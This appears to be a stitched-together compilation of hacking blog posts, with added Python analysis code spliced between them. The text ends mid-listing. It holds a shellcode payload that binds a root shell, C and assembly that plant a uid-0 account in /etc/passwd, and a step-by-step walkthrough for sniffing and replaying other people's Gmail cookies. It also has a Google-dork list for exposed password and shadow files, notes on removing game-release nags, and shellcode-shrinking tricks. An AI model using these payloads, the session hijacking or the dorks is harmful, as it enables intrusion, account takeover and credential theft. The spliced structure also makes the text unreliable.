However, writing an exploit by yourself, to convert a news line from a bug tracker into a working lockpick, is much more difficult. This article is not a guide on writing exploits, nor an overview of popular vulnerabilities. This is a step-by-step guide on developing a shellcode, a crucial point of any exploit software. Hopefully, learning how they work will help conscientious and respectable developers and system administrators to understand how malefactors think and to defend their systems against them.

How an Exploit Works

Take any exploit downloaded from the internet that promises you an easy root shell on a remote machine, and examine its source code. Find the most unintelligible piece of the code; it will be there, for sure. Most probably, you will find several lines of strange and unrelated symbols, something like this:

char shellcode[] =
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a"
"\xd4\xf2\xe7\x83\xeb\xfc\xe2\xf4\xbb\x0f\xa1\xa4\xd9\xbe\xf0\x8d"
"\xec\x8c\x6b\x6e\x6b\x19\x72\x71\xc9\x86\x94\x8f\x9b\x88\x94\xb4"
"\x03\x35\x98\x81\xd2\x84\xa3\xb1\x03\x35\x3f\x67\x3a\xb2\x23\x04"
"\x47\x54\xa0\xb5\xdc\x97\x7b\x06\x3a\xb2\x3f\x67\x19\xbe\xf0\xbe"
"\x3a\xeb\x3f\x67\xc3\xad\x0b\x57\x81\x86\x9a\xc8\xa5\xa7\x9a\x8f"
"\xa5\xb6\x9b\x89\x03\x37\xa0\xb4\x03\x35\x3f\x67";

This is shellcode, also sometimes referred to as "bytecode." Its content is not a magic word or random symbols. This is a set of low-level machine commands, the same as are in an executable file. This example shellcode opens port 4444 on a local Linux box and ties a Bourne shell to it with root privileges. With a shellcode, you can also reboot a system, send a file by email, etc. The main task for an exploit program is therefore to make this shellcode work.

Take, for example, a widely known error: the buffer overflow. Developers do not always check the data their functions receive as input. A simple example: the developer creates a dynamic array, allocates 100 bytes for it, and does not control the real number of elements. All elements that are out of the bounds of this array will be put onto the stack, and a so-called buffer overflow will occur. An exploit's task is to overflow a buffer and, after that, change the return address of execution to the address of the shellcode. If the shellcode gets control, it will be executed. It's pretty simple.

As I already said, this article is not a guide to writing exploits. There are many repositories of existing shellcodes (shellcode.org, Metasploit); however, they are not always enough. A shellcode is a low-level sequence of machine commands closely tied to a particular processor architecture and operating system. This is why understanding how it works can help prevent intrusions into your environment.

What Is It For?

To follow along, I expect you to have at least minimal assembly knowledge. As a platform for experiments, I chose Linux with a 32-bit x86 processor. Most exploits are intended for Unix services; therefore, they are of most interest. You need several additional tools: Netwide Assembler (nasm), ndisasm, and hexdump. Most Linux distributions include these by default.

The Process of Building

Shellcode stubs are usually written in assembler; however, it is easier to explain how one works by building it in C and then rewriting the same code in assembly. This is C code for appending a user to /etc/passwd:

#include <stdio.h>
#include <string.h>   /* strlen */
#include <stdlib.h>   /* exit */
#include <unistd.h>   /* write, close */
#include <fcntl.h>    /* open, O_WRONLY, O_APPEND */

int main(void) {
    char *filename = "/etc/passwd";
    char *line = "hacker:x:0:0::/:/bin/sh\n";   /* new passwd entry with uid 0 */
    int f_open;
    f_open = open(filename, O_WRONLY | O_APPEND);  /* write access, appending at the end */
    write(f_open, line, strlen(line));
    close(f_open);
    exit(0);
}

All of the code is pretty simple, except maybe the open() function. The constant O_WRONLY|O_APPEND given as a parameter opens the file for writing and appends the new data to the end of the file.

Here is a more usable example: executing a Bourne shell:

#include <stdio.h>
#include <unistd.h>   /* setreuid, execve */

int main(void) {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;                 /* argv must be NULL-terminated */
    setreuid(0, 0);                 /* try to become root (real and effective uid) */
    execve(name[0], name, NULL);    /* replace this process image with /bin/sh */
    return 0;                       /* only reached if execve() failed */
}

The setreuid(0,0) call attempts to obtain root privileges (if it is possible). execve(const char *filename, char *const argv[], char *const envp[]) is the main system call that executes any binary file or script. It has three parameters: filename is a full path to an executable file, argv[] is an array of arguments, and envp[] is an array of strings in the format key=value. Both arrays must end with a NULL element.

Now consider how to rewrite the C code given in the first example in assembly. x86 assembly executes system calls with the help of a special system interrupt that reads the number of the function from the EAX register and then executes the corresponding function. The function codes are in the file /usr/include/asm/unistd.h. For example, a line in this file, #define __NR_open 5, means that the function open() has the identification number 5. In a similar way, you can find all other function codes: exit() is 1, close() is 6, setreuid() is 70, and execve() is 11. This knowledge is enough to write a simple working application.
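The syscall numbers just listed are also what a defender keys on when triaging an unknown blob of machine code. The following is an added example (my code, not the article's): a linear sweep over raw x86-32 bytes that tracks constants loaded into EAX and names the syscall behind each int 0x80. It decodes only the handful of opcodes such stubs use and treats anything else as a one-byte skip, so it is a heuristic, not a disassembler; the sample bytes are a hand-assembled encoding of the article's own /etc/passwd listing, with the two data addresses replaced by zero placeholders.

```python
"""Linear-sweep triage of raw x86-32 machine code: which Linux syscalls does an
unknown blob invoke via int 0x80? Added example, not part of the original article."""
from __future__ import annotations

# Syscall numbers quoted in the article (from /usr/include/asm/unistd.h, 32-bit x86).
SYSCALL_NAMES = {1: "exit", 4: "write", 5: "open", 6: "close", 11: "execve", 70: "setreuid"}


def scan_syscalls(code: bytes) -> list[tuple[int, int | None, str]]:
    """Return (offset, eax_value, syscall_name) for every `int 0x80` in `code`.

    EAX is tracked only through the constant-loading forms shellcode normally uses
    (mov eax, imm32 / mov al, imm8 / xor eax, eax). Anything else that can write EAX,
    including the return value of a previous syscall, makes its value unknown (None).
    """
    eax: int | None = None
    found = []
    i, n = 0, len(code)
    while i < n:
        op = code[i]
        modrm = code[i + 1] if i + 1 < n else None
        reg_form = modrm is not None and (modrm & 0xC0) == 0xC0   # mod == 11: register operand

        if 0xB8 <= op <= 0xBF and i + 5 <= n:              # mov r32, imm32
            if op == 0xB8:                                  # destination is EAX
                eax = int.from_bytes(code[i + 1:i + 5], "little")
            i += 5
        elif 0xB0 <= op <= 0xB7 and i + 2 <= n:            # mov r8, imm8
            if op == 0xB0:                                  # mov al, imm8 writes the low byte only
                eax = ((eax or 0) & 0xFFFFFF00) | code[i + 1]
            i += 2
        elif op == 0x31 and reg_form:                       # xor r32, r32
            if (modrm & 7) == 0:                            # destination (rm) is EAX
                eax = 0 if (modrm & 0x3F) == 0 else None    # xor eax,eax zeroes; xor eax,other unknown
            i += 2
        elif op == 0x89 and reg_form:                       # mov r/m32, r32
            if (modrm & 7) == 0:                            # destination (rm) is EAX
                eax = None
            i += 2
        elif op == 0xF7 and reg_form:                       # group 3: test/not/neg/mul/imul/div/idiv
            if ((modrm >> 3) & 7) >= 4:                     # /4../7 all write EAX
                eax = None
            i += 2
        elif op == 0x58:                                    # pop eax
            eax = None
            i += 1
        elif 0x50 <= op <= 0x5F:                            # other push/pop r32
            i += 1
        elif op == 0x68 and i + 5 <= n:                     # push imm32
            i += 5
        elif op == 0x6A and i + 2 <= n:                     # push imm8
            i += 2
        elif op == 0xCD and i + 2 <= n:                     # int imm8
            if code[i + 1] == 0x80:
                found.append((i, eax, SYSCALL_NAMES.get(eax, "unknown")))
                eax = None                                  # the kernel returns its result in EAX
            i += 2
        else:
            i += 1                                          # unknown opcode: skip one byte (heuristic)
    return found


def syscall_trace(code: bytes) -> list[str]:
    """One readable line per syscall, e.g. 'open(5) @ 0x000f'."""
    return [f"{name}({eax if eax is not None else '?'}) @ 0x{off:04x}"
            for off, eax, name in scan_syscalls(code)]


# Constructed sample: the article's /etc/passwd listing, hand-assembled. The addresses
# of `filename` and `line` are link-time values and appear here as 0x00000000 placeholders.
SAMPLE = bytes.fromhex(
    "b805000000" "bb00000000" "b901040000" "cd80"   # mov eax,5; mov ebx,filename; mov ecx,1025; int 0x80
    "89c3"                                          # mov ebx,eax
    "b804000000" "b900000000" "ba18000000" "cd80"   # mov eax,4; mov ecx,line; mov edx,24; int 0x80
    "b806000000" "cd80"                             # mov eax,6; int 0x80
    "b801000000" "bb00000000" "cd80"                # mov eax,1; mov ebx,0; int 0x80
)

if __name__ == "__main__":
    for entry in syscall_trace(SAMPLE):
        print(entry)
```

A second int 0x80 that follows a syscall without reloading EAX is reported as unknown, because the value then depends on what the kernel returned at run time.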
The /etc/passwd amendment application code in assembly is:

section .data
filename db '/etc/passwd', 0
line db 'hacker:x:0:0::/:/bin/sh',0x0a

section .text
global _start

_start:
; open(filename,O_WRONLY|O_APPEND)
mov eax, 5
mov ebx, filename
mov ecx, 1025
int 0x80
mov ebx, eax

; write(f_open, line, 24)
mov eax, 4
mov ecx, line
mov edx, 24
int 0x80

; close(f_open)
mov eax, 6
int 0x80

; exit(0)
mov eax, 1
mov ebx, 0
int 0x80

It's a well-known fact that an assembly program consists of three segments: the data segment, which contains variables; the code segment, containing code instructions; and a stack segment, which provides a special memory area for storing data. This example uses only the data and code segments. The operators section .data and section .text mark their beginnings. The data segment contains the declaration of two char variables, filename and line, each consisting of a set of bytes (see the db mark in the definition).

The code segment starts from a declaration of an entry point, global _start. This tells the system that the application code starts at the _start label.

The next steps are easy; to call open(), set the EAX register to the appropriate function code: 5. After that, pass parameters for the function. The simplest way of passing parameters is to use the registers EBX, ECX, and EDX. EBX gets the first function parameter, the address of the beginning of the filename string variable, which contains a full path to a file and a terminating zero char (most system functions operating on strings demand a trailing null). The ECX register gets the second parameter, giving information about the file open mode (the constant O_WRONLY|O_APPEND in numeric form).
With all of the parameters set, the code calls interrupt 0x80. It reads the function code from EAX and calls the appropriate function. After completing the call, the application continues, calling write(), close(), and exit() in exactly the same way.


Sniff Gmail cookies (posted 2009-06-27)

Today I will teach you how to sniff Gmail cookies on an unsecured wireless network using the Wifizoo tool in BackTrack 3.

1) mkdir /root/Desktop/wifizoo
2) cd /root/Desktop/wifizoo
3) wget http://wifizoo.info/wifizoo_black_v1.3.tar.bz2
4) tar jxvf wifizoo_black_v1.3.tar.bz2
5) cd /root/Desktop/wifizoo/wifizoo_black_v1.3

Now we'll open the file wifizoo.py (a Python script) with kwrite and modify it to match the interface you use. Row 50 indicates the interface; as my card has an RT73 chipset, I use rausb0.

Code:

6) conf.iface = 'rausb0'

Then make sure you put your wifi card in monitor mode.

Run this command in another terminal:

7) airmon-ng start rausb0

and then monitor the access points:

8) airodump-ng rausb0

Then come back to the first terminal and type this command:

9) python wifizoo.py -i rausb0 (your interface)

You can see that Wifizoo launches a web interface on port 8000 on the local machine and that the proxy is available on port 8080. This will be very useful shortly. First, let us connect to the Wifizoo control panel with Firefox:

10) firefox 127.0.0.1:8000

And here is the Wifizoo administrative interface.

We get down to business by clicking on "Cookies":

Heyyy, Wifizoo has captured cookies; you can see in the image a Google Mail cookie.
Before you can use these cookies, you must
configure Firefox to connect through the proxy running locally on port 8080. It is under Edit, Preferences, Network: check Manual proxy configuration and set the HTTP proxy to port 8080.

We can now return to the "Cookies" panel of Wifizoo. By clicking on the Gmail cookie (all information about the cookie, in blue), Wifizoo will automatically load it into the proxy currently running on port 8080. The indication "Cookie Set!" shows that the cookie has been forged and can be reused.

Then simply click "jump to it"; it will take you to Google.com, then click Mail.

You're done; you have sniffed someone else's cookies.

So never use unsecured wireless networks.

Be secure, stay secure ;)

Author: rez


Google Hacking (posted 2009-06-27)

No need for any more explanation...

Newbies, be careful.

Note: please use a proxy to visit any site you get through a search:

filetype:htpasswd htpasswd
intitle:"index of" ".htpasswd" -intitle:"dist" -apache -htpasswd.c
index.of.private (something private)
intitle:index.of master.passwd
inurl:passlist.txt (to find password lists)
intitle:"index of..etc" passwd
intitle:admin intitle:login
"incorrect syntax near" (SQL script error)
intitle:"the page cannot be found" inetmgr (weakness in IIS4)
intitle:index.of ws_ftp.ini
"supplied arguments is not a valid postgresql result" (possible SQL weakness)
_vti_pvt password intitle:index.of (FrontPage)
inurl:backup intitle:index.of inurl:admin
"index of /backup"
index.of.password
index.of.winnt

inurl:"auth_user_file.txt"
"index of /admin"
"index of /password"
"index of /mail"
"index of /" +passwd
"index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype:mail
allintitle: restricted filetype:doc site:gov
administrator.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
global.asax index
inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:"index of" .sh_history
intitle:"index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.1st
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members or accounts
intitle:"index of" user_carts or user_cart


Game Hacking (posted 2009-06-27)

Tools used:
-----------

- OllyDbg + plugins
- ImpREC
- Cheat Engine 5.3
- SnagIt

Description:
-----------

[1/4] How to use WriteProcessMemory to sniff trainers
[2/4] How to apply the above if the game updates and you can't find any working trainers
[3/4] Basic exporting of code caves and basic functionality of Cheat Engine (auto-assembler, scripting and making a trainer on the fly)
[4/4] Getting rid of the stupid egotistic nags of releasers (Myth, DEViANCE etc.), basic UPX unpacking...

All tutorials target the game Sacred from Ascaron, but are meant for any game!

First tutorial:
-------------
- I used sheep's mega-trainer as a reference;
* Side note: this is addressed to all sites stating that his trainer is for v1.0; WRONG! It's for v1.02! *
- Olly + WriteProcessMemory, and sniffed what it writes to the game;

Second tutorial:
---------------
- Explained how sheep's one-sided god mode works;
- Basic exporting of code to the clipboard;
- Used SnagIt to get a snapshot of the game code at the "god mode" address;

Third tutorial:
-------------
- "Updated" the game from v1.02 to v1.8.6
- Purpose: update sheep's trainer for WHINERS (OMG! I can't find a working trainer; guess what, now you can update the sh!t on your own)
- Basic Cheat Engine scripting based on sheep's code cave;
- On-the-fly trainer making with CE's engine;

Fourth tutorial:
--------------
- Myth releases are a pain in the ass;
- They pack their files and add .dlls along with them, .dlls whose purpose is to throw an annoying nag in the user's face :|
- Taught how to use Olly to manage basic UPX unpacking and get rid of the nag;

BIG n0Tes:
-----------
1. Sniffing is for teaching purposes, and is meant to help those who don't have working trainers for updated versions of any game available. If you're caught ripping code, you're toasted. We know it when we see it!
2. Excuse any typos or mistakes.
3. Greetz fly out to team Extalia and to sheep for his tremendous work!


Understanding Email Security Anonymity (posted 2009-06-27)

When we talk about protecting email privacy and anonymity, we consider that it can be compromised by message interception, or because an email message contains information that the sender was not intending to pass to the recipient.
In this article we will try to explain how the email system works, what information can be extracted from a regular email message, and how email privacy can be protected.

1. Email privacy - how can it be compromised?

Before we continue with how to protect email privacy, we should understand how the email system works and what the issues related to email privacy are.

How the email system works.
The most common way of sending email is using the ISP (Internet Service Provider) or company mail server. When you click the "send" button, your email software establishes an SMTP (Simple Mail Transfer Protocol) connection to your email server. The server will attempt to deliver the message directly to your recipient's ISP mail server, but in case that server is not accessible at the moment it will deliver the message to an intermediate email server known as an MX relay host. After traveling through the MX hosts, the message is delivered to the recipient's mailbox on his/her ISP mail server. It is stored there until your recipient retrieves the message using the POP (Post Office Protocol) or IMAP (Internet Message Access Protocol) protocol. This is how your email message travels through the Internet from the sender's computer to the recipient's computer. Web mail services work the same way, but instead of email software you use a web interface to compose or read emails.

How can an email message be intercepted?
Where can it be intercepted? At each step along the way. An email message is stored on at least two servers on its way: the sender's ISP mail server and the recipient's ISP mail server. When traveling through MX hosts, the message is stored on each of them. When your mail is addressed to a bank, an investment company or business partners, it can attract the attention of IT staff who perform mail server monitoring.
And there is nothing that can prevent unscrupulous IT staff with access to the mail server from opening and reading that message. Another problem is that unauthorized personnel or hackers can gain access to a mail server where physical access security and network security are weak.
There is another way to intercept email messages: network traffic interception. In most cases network traffic monitoring is performed by government agencies at the ISP level. Email traffic can be rated according to keywords as "suspicious" and stored for later review by government agency staff; this is how the US Carnivore system works.

Email headers anonymity.
When analyzing an email message we can get a lot of information about its sender. Computer IP address, geographic location, time zone, language preferences, computer LAN name, email software used, etc.: all this information can be found in the email message. An important point is that all this info is passed without the sender knowing about it. Well, what is bad about that, you may ask. It depends on how this information can be used. For example, you may not wish your recipient to know that your operating system uses Dutch as its default language (e.g. your native language is Dutch), or that you are in Australia now and use one of the local ISPs. All this information can be easily extracted from the email message headers.
Every email message consists of two parts: message header and message body.
The header part can be compared to a letter envelope. It contains the message subject, sender's and recipient's email addresses, the date and time the message was sent and arrived, and lists the points your message went through on its way to the recipient. Message headers also contain service information about the sender's email software.
This information is used to deliver the message, and allows tech staff to debug email problems when they occur.

Here is an example of message headers:

Return-Path: <customer@somedomain.com>
Received: from [192.168.157.3] by web5203.mail.foobar.com; Sat, 21 Nov 2003 12:42:20 -0800 PST
Message-ID: <2003114546184545.45639.qmail@foobar.com>
Date: Sat, 21 Nov 2003 12:42:20 -0800 (PST)
From: "Peter J. Smith" <customer@somedomain.com>
Subject: My Private Message
To: example@yahooo.com
MIME-Version: 1.0
Content-Type: text/html;charset="GB2312"
X-Mailer: Microsoft Outlook Express 5.00.2615.2000

And here is the information we can extract from the headers (using it to draw a picture of the sender):
Sender IP address: [192.168.157.3] points to the sender's computer. Anyone can get further details about the ISP (address, phone, fax, email) by running a search through the WHOIS databases.
Sender ISP: "web5203.mail.foobar.com" and "@foobar.com": the message was sent using the web interface of foobar.com (further details available at the website).
Sender's email software: Microsoft Outlook Express 5.00.2615.2000 (this version's known bugs could be used for sending a trojan to the computer).
Sender's local time zone: -0800 (PST), US Pacific coast (points to the geographic location of the computer).
Sender's native language: charset="GB2312", a Chinese character set (the user is probably a member of the local Chinese community).

It should be noted that only three lines in the message headers were explicitly supplied by the sender: the "From" address, the "To" address and the "Subject" line. All other data was inserted by email software and intermediate servers. Usually users have no control over these headers, but these headers are the most dangerous for email privacy and contain a lot of information about the sender.
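The walk-through above can be done programmatically, which is how a mail gateway or an incident responder would triage a message. The following is an added example (my code, not the article's) that parses a header block with Python's standard email package and reports the same items: originating IP from Received, relay host, time zone, mailer and charset, plus which headers the sender never typed. The sample header block is constructed to mirror the one quoted above; the check for private (RFC 1918) address space is my addition.

```python
"""Profile what a message's headers reveal about its sender.
Added example, not part of the original article."""
from __future__ import annotations

import re
from email import message_from_string
from ipaddress import ip_address

# Constructed sample mirroring the header block quoted in the article.
SAMPLE_HEADERS = """\
Return-Path: <customer@somedomain.com>
Received: from [192.168.157.3] by web5203.mail.foobar.com; Sat, 21 Nov 2003 12:42:20 -0800 PST
Message-ID: <2003114546184545.45639.qmail@foobar.com>
Date: Sat, 21 Nov 2003 12:42:20 -0800 (PST)
From: "Peter J. Smith" <customer@somedomain.com>
Subject: My Private Message
To: example@yahooo.com
MIME-Version: 1.0
Content-Type: text/html;charset="GB2312"
X-Mailer: Microsoft Outlook Express 5.00.2615.2000

"""

BRACKET_IP = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")      # "[1.2.3.4]" in Received
RELAY_HOST = re.compile(r"\bby\s+([A-Za-z0-9.-]+)")              # "by <host>" in Received
TZ_SUFFIX = re.compile(r"([+-]\d{4})(?:\s*\(([A-Za-z]+)\))?\s*$")  # "-0800 (PST)" at end of Date

# The only headers the article says the sender supplies explicitly.
USER_SUPPLIED = {"from", "to", "subject"}


def profile_sender(raw_message: str) -> dict:
    """Extract sender-identifying details from a message's headers."""
    msg = message_from_string(raw_message)
    received = msg.get_all("Received") or []

    ips = [ip for hdr in received for ip in BRACKET_IP.findall(hdr)]
    # RFC 1918 space is a LAN address behind NAT: it names a machine on the sender's
    # network but cannot be resolved to an ISP through WHOIS.
    private_ips = [ip for ip in ips if ip_address(ip).is_private]
    relays = [m.group(1) for hdr in received if (m := RELAY_HOST.search(hdr))]

    tz = TZ_SUFFIX.search(msg.get("Date", ""))
    mailer = msg.get("X-Mailer")
    charset = msg.get_content_charset()      # the email package lower-cases it

    # Headers inserted by software or relays rather than typed by the sender.
    implicit = sorted({k.lower() for k in msg.keys()} - USER_SUPPLIED)

    leaks = []
    if ips:
        leaks.append("originating-ip")
    if relays:
        leaks.append("sending-service")
    if mailer:
        leaks.append("client-software-version")
    if tz:
        leaks.append("timezone")
    if charset and charset not in ("us-ascii", "utf-8"):
        leaks.append("language-charset")

    return {
        "originating_ips": ips,
        "private_ips": private_ips,
        "relays": relays,
        "tz_offset": tz.group(1) if tz else None,
        "tz_name": tz.group(2) if tz else None,
        "mailer": mailer,
        "charset": charset,
        "implicit_headers": implicit,
        "leaks": leaks,
    }


if __name__ == "__main__":
    for key, value in profile_sender(SAMPLE_HEADERS).items():
        print(f"{key:17} {value}")
```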
There is no problem tracking the message sender using header data.

Secure email software.
Using the right email software is an important point for email security. If you are using buggy email software you are open to hacker attacks, since the email message contains your email software vendor and version number. That is enough information to write a specially formatted message (using your email software's security vulnerabilities) to hang your computer or infect it with a Trojan. If somebody suspects you of storing confidential information on your computer, he/she can try to hack in to get it. All the attacker needs to start is your IP address from the email message header. Using security holes in your computer software (new Windows vulnerabilities are published almost daily) an attacker can gain full access to your computer and in the worst case obtain all your email passwords, banking and investment account data, private correspondence, business data, etc. All these horror scenarios are not a myth but today's reality; just search on Google for companies offering spying over the Internet. If your competitors can afford to spend a hundred dollars to learn your secrets, you are in danger.

Web bugs.
How can web browsing be related to emailing, you may ask? It's simple. Most email applications are capable of displaying HTML-formatted email messages. This is no different from viewing a regular web page, but the web page is displayed in your email software window, not in a browser. When viewing web pages in your email window you are taking the same risk as when browsing, e.g. you have to deal with cookies, JavaScript, Java, ActiveX controls, etc. IP anonymity and data interception issues should be taken into consideration as well.

There is one popular spying technique: web bugs.
To illustrate how they work, let us imagine that you are running some online business and have received an email message (possibly business related) from some unknown person:

From: someuser@yahoo.com
To: customer@foobar.com
Subject: Hello!
Hello!
How are you?
I'm fine.
David.

To attract your attention, your full name or your company name can be written in the "Subject" line. You have opened this message, and after reading it and considering it to be spam you throw it away. But you have not noticed that the message was HTML formatted, and it contained an image. The dot after the word "fine" was replaced by a small image, and that image was automatically downloaded from some website by your email software when you opened the message. Now, the email sender, after analyzing web server logs, can get some information on you: the date and time you read this email, your IP address, operating system, etc.
All this means that your email privacy can be compromised when you simply open an email message, even without replying to it.

2. How to protect your email privacy.
Even if you have nothing to hide, it is a good idea to take care of your email privacy. We have developed recommendations on how to make emailing as secure and private as possible.

2.1 Use encryption to protect your email messages. The only way to protect email messages from interception is to encrypt them. There are a few techniques to do so.

* PGP and S/MIME encryption. Both PGP and S/MIME encrypt the message body only, leaving message headers unprotected. PGP and S/MIME can be used if you require end-to-end encryption. Using those methods requires prior agreement between the parties, and a "public key" exchange should be done before emailing securely.
* SSL encrypted connection to the mail server. SSL can be used to encrypt the email traffic as a whole.
SSL encrypted transport prevents interception of message headers and message body on the way to/from the mail server while sending/receiving email. SSL can be used to effectively protect your email traffic from interception by the ISP or government agencies.

Please note, PGP and S/MIME do not provide anonymity. Even if you encrypt email messages with PGP or S/MIME the message headers still remain open, and will be transferred in clear text through the Internet. You have to understand that unencrypted "To:", "From:", "Subject:", etc. fields may disclose your identity and can contain confidential information. In addition to PGP or S/MIME, SSL connection


Fake Your IP with SSH Tunnelier & SSH Host Account (posted 2009-06-27)

Video guide download link:
http://rapidshare.com/files/208132514/SSH_SOCK_Tunnelier.rar
File name: SSH_SOCK_Tunnelier.rar
Size: 2002 KB
Status: Normal Download

First we need to install the Bitvise Tunnelier software (required) and an SSH host account (or an SSH File Save).
- You can download Tunnelier for FREE at www.bitvise.com
- Then install it on your PC
Download link:
http://dl.bitvise.com/Tunnelier-Inst.exe
Mirror:
http://dl.bitvise.com.s3-external-3.amazonaws.com/Tunnelier-Inst.exe

- Here I show how to use SSH SOCKS with an SSH File Save
- That is the SSH File Save; open it. With an SSH File Save you need do nothing other than run it by clicking Login
- Before using it, just check which port the SSH File Save uses
Click Services and see the port ^^... here it is 7210
- OK, now run the SSH File Save by clicking Login
- OK, and it said succeeded.
(We have successfully connected with the SSH host account.)

Now change your browser settings to use SSH to fake your IP (we can minimize the SSH File Save).
- In the browser, for SOCKS HOST (SOCKS IP) always use:
127.0.0.1
- And the port is the SSH port. The SOCKS type is SOCKS5.
- Then check our IP after faking at http://ip-address.domaintools.com
- And we are done ^^

Remember to keep the SSH File Save running. How do you know whether the SSH is running or not? It's very simple: just look at the small icon of the SSH SOCKS in the taskbar...
When you need to stop faking through the SSH SOCKS, just do as I do... And we are done.


Advanced Shellcoding Techniques (posted 2009-06-27)

Introduction

This paper assumes a working knowledge of basic shellcoding techniques and x86 assembly; I will not rehash these in this paper. I hope to teach you some of the lesser known shellcoding techniques that I have picked up, which will allow you to write smaller and better shellcodes. I do not claim to have invented any of these techniques, except for the one that uses the div instruction.


The multiplicity of mul

This technique was originally developed by Sorbo of darkircop.net. The mul instruction may, on the surface, seem mundane, and its purpose obvious. However, when faced with the difficult challenge of shrinking your shellcode, it proves to be quite useful. First some background information on the mul instruction itself.

mul performs an unsigned multiply of two integers. It takes only one operand; the other is implicitly specified by the %eax register.
So, a common mul instruction might look something like this:

movl $0x0a,%eax
movl $0x0a,%ebx
mul %ebx        # mul takes a register or memory operand, not an immediate

This would multiply the value stored in %eax by the operand of mul, which in this case would be 10*10. The result is then implicitly stored in EDX:EAX. The result is stored over a span of two registers because it has the potential to be considerably larger than the previous value, possibly exceeding the capacity of a single register (this is also how floating points are stored in some cases, as an interesting sidenote).

So, now comes the ever-important question. How can we use these attributes to our advantage when writing shellcode? Well, let's think for a second: the instruction takes only one operand; therefore, since it is a very common instruction, it will generate only two bytes in our final shellcode. It multiplies whatever is passed to it by the value stored in %eax, and stores the value in both %edx and %eax, completely overwriting the contents of both registers, regardless of whether it is necessary to do so in order to store the result of the multiplication. Let's put on our mathematician hats for a second and consider this: what is the only possible result of a multiplication by 0? The answer, as you may have guessed, is 0. I think it's about time for some example code, so here it is:

xorl %ecx,%ecx
mul %ecx

What is this shellcode doing? Well, it zeroes out the %ecx register using the xor instruction, so we now know that %ecx is 0. Then it does a mul %ecx, which, as we just learned, multiplies its operand by the value in %eax, and then proceeds to store the result of this multiplication in EDX:EAX. So, regardless of %eax's previous contents, %eax must now be 0. However, that's not all: %edx is zeroed now too, because, even though no overflow occurs, it still overwrites the %edx register with the sign bit (left-most bit) of %eax.
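The register effects claimed here are easy to check with a few lines of emulation. The following is an added example (my code, not the paper's) that models mul, divl and leal with the 32-bit wraparound and EDX:EAX rules the x86 actually applies, and steps the sequences from this section and from the divl and leal sections further below, including the two cases where divl faults: a zero in %eax, and a non-zero %edx.

```python
"""Emulate the register effects of mul, divl and leal on 32-bit x86.
Added example, not part of the original paper; register names follow its AT&T notation."""
MASK32 = 0xFFFFFFFF


class DivideError(Exception):
    """The CPU's #DE fault, which Linux delivers to the process as SIGFPE."""


def xorl(regs, src, dst):
    regs[dst] ^= regs[src]


def mul(regs, src):
    # mul r32: EDX:EAX = EAX * src (unsigned). Both halves are always written,
    # which is why the sequence below zeroes EDX as a side effect.
    product = regs["eax"] * regs[src]
    regs["eax"] = product & MASK32
    regs["edx"] = product >> 32


def divl(regs, src):
    # divl r32: EAX = EDX:EAX / src, EDX = remainder (unsigned).
    # Faults on a zero divisor, or when the quotient does not fit in 32 bits.
    divisor = regs[src]
    if divisor == 0:
        raise DivideError("division by zero")
    dividend = (regs["edx"] << 32) | regs["eax"]
    quotient, remainder = divmod(dividend, divisor)
    if quotient > MASK32:
        raise DivideError("quotient overflow: EDX was not zero")
    regs["eax"], regs["edx"] = quotient, remainder


def leal(regs, disp, base, dst):
    # leal disp(base), dst: computes the address and stores it; memory is never touched.
    regs[dst] = (regs[base] + disp) & MASK32


def fresh(**values):
    regs = {"eax": 0, "ebx": 0, "ecx": 0, "edx": 0}
    regs.update(values)
    return regs


def mul_zero_trick(eax, edx, ecx):
    """xorl %ecx,%ecx ; mul %ecx  -> (eax, edx, ecx), whatever they held before."""
    regs = fresh(eax=eax, edx=edx, ecx=ecx)
    xorl(regs, "ecx", "ecx")
    mul(regs, "ecx")
    return regs["eax"], regs["edx"], regs["ecx"]


def div_exit_trick(syscall_return, edx=0):
    """divl %eax after a syscall. With EAX != 0 and EDX == 0 the result is 1 (exit)."""
    regs = fresh(eax=syscall_return & MASK32, edx=edx)
    divl(regs, "eax")
    return regs["eax"]


def div_exit_faults(syscall_return, edx=0):
    """True when divl %eax would raise #DE for this register state."""
    try:
        div_exit_trick(syscall_return, edx)
    except DivideError:
        return True
    return False


def leal_load(disp, base_value):
    """xorl %ecx,%ecx ; leal disp(%ecx),%eax  -> the constant disp, all 32 bits replaced."""
    regs = fresh(ecx=base_value, eax=0xDEADBEEF)
    xorl(regs, "ecx", "ecx")
    leal(regs, disp, "ecx", "eax")
    return regs["eax"]


if __name__ == "__main__":
    print(mul_zero_trick(0x12345678, 0xCAFEBABE, 0xFFFFFFFF))   # all three registers zero
    print(div_exit_trick(-1))                                    # 0xFFFFFFFF / 0xFFFFFFFF = 1
    print(leal_load(0x11, 0x0BADF00D))                           # 17
    print(div_exit_faults(0), div_exit_faults(-1, edx=0xFFFFFFFF))
```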
Using this technique we can zero out three registers in only three bytes, whereas by any other method(that I know of) it would have taken at least six.<br /><br /><br />The div instruction<br /><br />Div is very similar to mul, in that it takes only one operand and implicitly divides the operand by the value in %eax. Also like, mul it stores the result of the divide in %eax. Again, we will require the mathematical side of our brains to figure out how we can take advantage of this instruction. But first, let's think about what is normally stored in the %eax register. The %eax register holds the return value of functions and/or syscalls. Most syscalls that are used in shellcoding will return -1(on failure) or a positive value of some kind, only rarely will they return 0(though it does occur). So, if we know that after a syscall is performed, %eax will have a non-zero value, and that the instruction divl %eax will divide %eax by itself, and then store the result in %eax, we can say that executing the divl %eax instruction after a syscall will put the value 1 into %eax. So...how is this applicable to shellcoding? Well, their is another important thing that %eax is used for, and that is to pass the specific syscall that you would like to call to int $0x80. It just so happens that the syscall that corresponds to the value 1 is exit(). Now for an example:<br /><br /> <br />xorl %ebx,%ebx<br />mul %ebx<br />push %edx<br />pushl $0x3268732f<br />pushl $0x6e69622f<br />mov %esp, 